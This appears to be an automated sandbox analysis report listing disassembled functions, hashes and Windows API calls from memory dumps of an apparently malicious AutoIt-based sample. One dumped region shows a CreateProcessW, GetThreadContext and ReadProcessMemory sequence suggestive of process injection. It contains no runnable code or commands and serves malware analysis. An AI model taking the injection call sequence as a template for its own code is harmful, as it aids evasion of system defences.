                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                            • Instruction ID: eac355a649b24a1642e174c4ae91b0f1d4daa5d353f2b9d52a0ace3f6d0e1a7f
                                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                            • Instruction Fuzzy Hash: D631A4B1B04616AFC744DF68DCD1E69B3A9FF483207158629E519CB2D1EB30F960CB90
                                                                            APIs
                                                                              • Part of subcall function 0082571C: __FF_MSGBANNER.LIBCMT ref: 00825733
                                                                              • Part of subcall function 0082571C: __NMSG_WRITE.LIBCMT ref: 0082573A
                                                                              • Part of subcall function 0082571C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,00820DD3,?), ref: 0082575F
                                                                            • std::exception::exception.LIBCMT ref: 00820DEC
                                                                            • __CxxThrowException@8.LIBCMT ref: 00820E01
                                                                              • Part of subcall function 0082859B: RaiseException.KERNEL32(?,?,?,008B9E78,00000000,?,?,?,?,00820E06,?,008B9E78,?,00000001), ref: 008285F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 3902256705-0
                                                                            • Opcode ID: 1b607fd16fde25591e0678b5caed53cbb7bb558a13eaa2a3ed4f7ff1b6de3329
                                                                            • Instruction ID: 4136f12895760623cf0f01088c66b8fe1d4f6e2d473f14b9b6170a6083cb2ddd
                                                                            • Opcode Fuzzy Hash: 1b607fd16fde25591e0678b5caed53cbb7bb558a13eaa2a3ed4f7ff1b6de3329
                                                                            • Instruction Fuzzy Hash: 2CF0813550222DA6CF10BAA8FC159DEBBA8FF01351F144566F904E6282DFB09AC49AD6
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            • Opcode ID: d8e51220039271e28a31830b12300b600ed264e50c91e3a89fcf853e1cc88185
                                                                            • Instruction ID: 2f587354009fd6a86597dd8775a7d9b8eb21875c83af06fa72df5da6b6973483
                                                                            • Opcode Fuzzy Hash: d8e51220039271e28a31830b12300b600ed264e50c91e3a89fcf853e1cc88185
                                                                            • Instruction Fuzzy Hash: 5E01D471841A28EBCF22AF6CFC0249E7B61FF60321F404115B824DA291DB318AD1DF92
                                                                            APIs
                                                                              • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                                            • __lock_file.LIBCMT ref: 008253EB
                                                                              • Part of subcall function 00826C11: __lock.LIBCMT ref: 00826C34
                                                                            • __fclose_nolock.LIBCMT ref: 008253F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            • Opcode ID: 3bf0983281281d552c35199543c9fff8153c642634289b77d306591568f5cfcb
                                                                            • Instruction ID: 301afc50ae58fe0f4ea7fd90ebb5f5660d0cbab0d1be4bad3c2f68e1c7272ab4
                                                                            • Opcode Fuzzy Hash: 3bf0983281281d552c35199543c9fff8153c642634289b77d306591568f5cfcb
                                                                            • Instruction Fuzzy Hash: C3F09671842A24DADB10BB69B8057AD6AE0FF42374F209149E424EB2C1CBBC49C15B53
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00E5475D
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E54781
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E547A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1333401749.0000000000E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E52000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_e52000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                            • Instruction ID: b88c320ac080f45794da82d089d94af8a48289e58bf50ce95b62ba257f71d45d
                                                                            • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                            • Instruction Fuzzy Hash: D912FF24E14658C6EB24DF60D8507DEB232EF68300F10A4E9910DEB7A5E77A4F85CF5A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 537056d3ac10abb3d3186e3b3e5fd98cf57d0ce1dc88f04c4f4573ea4c3c194f
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 3131B2B0A001199BC718DF58E484A69FBA6FB59304B6487A5E80ACB356D731EEC1DFC0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 2d62ae91ed03bfc8a6dff840bc10486d27946e94b5a16f773fa59188227eb50f
                                                                            • Instruction ID: 259339cb77e7a194745a6cb3d98b6f0c023eeabb034aac946c9077704bae0893
                                                                            • Opcode Fuzzy Hash: 2d62ae91ed03bfc8a6dff840bc10486d27946e94b5a16f773fa59188227eb50f
                                                                            • Instruction Fuzzy Hash: 034108745043519FDB54DF18C848B1ABBE0FF45318F0988ACE9998B362C731E885CF92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 943e03756ac5436c064ce611558a88fa9ab8fb449eca820566662923525ccd07
                                                                            • Instruction ID: 3681f1a96714f938a6064e143b533588484d85d06c882e27eac42c619c55e2eb
                                                                            • Opcode Fuzzy Hash: 943e03756ac5436c064ce611558a88fa9ab8fb449eca820566662923525ccd07
                                                                            • Instruction Fuzzy Hash: A62121B2A14A1EEBDB108F25EC4176E7BB4FB94360F21852AE886C51E0EB30D1D0D785
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b04da22c93e3fc01b9820f0760eb7faed3dd03051ca0b1b6a993d43e0ac9c69b
                                                                            • Instruction ID: 7b3249fcdaad12a78d83b400b03332e5eda8476345d7b6611a36ad28c7a6ad5b
                                                                            • Opcode Fuzzy Hash: b04da22c93e3fc01b9820f0760eb7faed3dd03051ca0b1b6a993d43e0ac9c69b
                                                                            • Instruction Fuzzy Hash: AF216D314097519FD7225B78BC01AE77BA4EF43320B0647A6FCA48B4E2E3251E61DAA1
                                                                            APIs
                                                                              • Part of subcall function 00804BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00804BEF
                                                                              • Part of subcall function 0082525B: __wfsopen.LIBCMT ref: 00825266
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E0F
                                                                              • Part of subcall function 00804B6A: FreeLibrary.KERNEL32(00000000), ref: 00804BA4
                                                                              • Part of subcall function 00804C70: _memmove.LIBCMT ref: 00804CBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                            • String ID:
                                                                            • API String ID: 1396898556-0
                                                                            • Opcode ID: 8e69a5c9931b69c6bfe70a4266def9d4138c56410599e7ea153f0363e05f774b
                                                                            • Instruction ID: 69cf53b5d1cc05ee9726c3e4af05183c9e43570cf4324225504d34515870ac9d
                                                                            • Opcode Fuzzy Hash: 8e69a5c9931b69c6bfe70a4266def9d4138c56410599e7ea153f0363e05f774b
                                                                            • Instruction Fuzzy Hash: A411C472680205ABCF14AFB8CC12F6D77A9FF84720F108829F741E71C1DA7599019B92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 13a54df706f449f753baa450d0559405585819bc3bf8d64b52e18b6fea5c967d
                                                                            • Instruction ID: 84257517050546a56bb768608ec95c2d792af2c4b51e766c02b823e5731295c5
                                                                            • Opcode Fuzzy Hash: 13a54df706f449f753baa450d0559405585819bc3bf8d64b52e18b6fea5c967d
                                                                            • Instruction Fuzzy Hash: 8221F0B4908305DFDB54DF64C844A1ABBE0FF88314F058968E98A97762D731E845CB92
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 008248A6
                                                                              • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2597487223-0
                                                                            • Opcode ID: 64408703e84e43c72e42c8bb6b6899062e7233d0640ea51a53153e498f13376c
                                                                            • Instruction ID: fbcce16b4b8b25456a43ab305e2fc234a68084a689bd3cc33f73c7bb90d33c1b
                                                                            • Opcode Fuzzy Hash: 64408703e84e43c72e42c8bb6b6899062e7233d0640ea51a53153e498f13376c
                                                                            • Instruction Fuzzy Hash: A7F0C831911629EBDF11AF78EC057EE36E0FF01325F155424F424D6291DB7889D1DB62
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3109ed1952e65c0953fd1c2ced1339d02275efe947b90b4b9ba4186fccf01324
                                                                            • Instruction ID: ac88fc4117f58e9d3899e978eac00ee7044223a730c18f18bdf6ddba416eea3f
                                                                            • Opcode Fuzzy Hash: 3109ed1952e65c0953fd1c2ced1339d02275efe947b90b4b9ba4186fccf01324
                                                                            • Instruction Fuzzy Hash: C0F039B1641711CFCB749F68E894812BBE1FF143793209A3EE2D6C2660C732A880DF40
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008207B0
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath_memmove
                                                                            • String ID:
                                                                            • API String ID: 2514874351-0
                                                                            • Opcode ID: 0c7dc1fc228853e9e4f41bcaa08f8d7a586f73eaa51d3a5e7273d7e5ae8e5fa2
                                                                            • Instruction ID: bcec31e7549b0159b50c0abcee22e29864c7874175b6042b6f5dfe230f99cca4
                                                                            • Opcode Fuzzy Hash: 0c7dc1fc228853e9e4f41bcaa08f8d7a586f73eaa51d3a5e7273d7e5ae8e5fa2
                                                                            • Instruction Fuzzy Hash: A3E0CD3690412857C720D65C9C05FEA77DDEFC87A0F0541B5FD0CD7245DE60AC8086D1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                            • Instruction ID: 045d1df278ed5684a1650d72c60e4778c5ac1ec4050dd0263bf7afe5ea7c774a
                                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                            • Instruction Fuzzy Hash: 3DE092B0104B009FD7388A24D801BA373E1FB05304F00091DF2AAC3241EF63B8418B59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction ID: c55728a3be80fae1fce41ea41e945209dec5b7186d283d67de4621901b15cb5b
                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction Fuzzy Hash: EAB0927648020CB7CE012A86FC02A593B1AEB41B64F408020FB0C181A2A673A6A49A8A
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 00E54F41
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1333401749.0000000000E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E52000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_e52000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 4fea9a90f3471523ac0272e0027df157a25dee75b24a7eb367734c8116ea35ae
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: CBE0BF7494510D9FDB00EFA8D54969E7BB4EF04302F100561FD05A2280D63099548A62
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0088CB37
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088CB95
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0088CBD6
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088CC00
                                                                            • SendMessageW.USER32 ref: 0088CC29
                                                                            • _wcsncpy.LIBCMT ref: 0088CC95
                                                                            • GetKeyState.USER32(00000011), ref: 0088CCB6
                                                                            • GetKeyState.USER32(00000009), ref: 0088CCC3
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088CCD9
                                                                            • GetKeyState.USER32(00000010), ref: 0088CCE3
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088CD0C
                                                                            • SendMessageW.USER32 ref: 0088CD33
                                                                            • SendMessageW.USER32(?,00001030,?,0088B348), ref: 0088CE37
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0088CE4D
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0088CE60
                                                                            • SetCapture.USER32(?), ref: 0088CE69
                                                                            • ClientToScreen.USER32(?,?), ref: 0088CECE
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0088CEDB
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0088CEF5
                                                                            • ReleaseCapture.USER32 ref: 0088CF00
                                                                            • GetCursorPos.USER32(?), ref: 0088CF3A
                                                                            • ScreenToClient.USER32(?,?), ref: 0088CF47
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088CFA3
                                                                            • SendMessageW.USER32 ref: 0088CFD1
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D00E
                                                                            • SendMessageW.USER32 ref: 0088D03D
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0088D05E
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0088D06D
                                                                            • GetCursorPos.USER32(?), ref: 0088D08D
                                                                            • ScreenToClient.USER32(?,?), ref: 0088D09A
                                                                            • GetParent.USER32(?), ref: 0088D0BA
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D123
                                                                            • SendMessageW.USER32 ref: 0088D154
                                                                            • ClientToScreen.USER32(?,?), ref: 0088D1B2
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088D1E2
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D20C
                                                                            • SendMessageW.USER32 ref: 0088D22F
                                                                            • ClientToScreen.USER32(?,?), ref: 0088D281
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0088D2B5
                                                                              • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0088D351
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                            • String ID: S$@GUI_DRAGID$F
                                                                            • API String ID: 3977979337-4084185108
                                                                            • Opcode ID: 8f741025b64d56a28ba659732599d018ce6688917e3ea0a5d533c2c99ad317fc
                                                                            • Instruction ID: cdd927c7625440d00c18a39456455c0ab8f789782fcb7136b394ea279d81aa7e
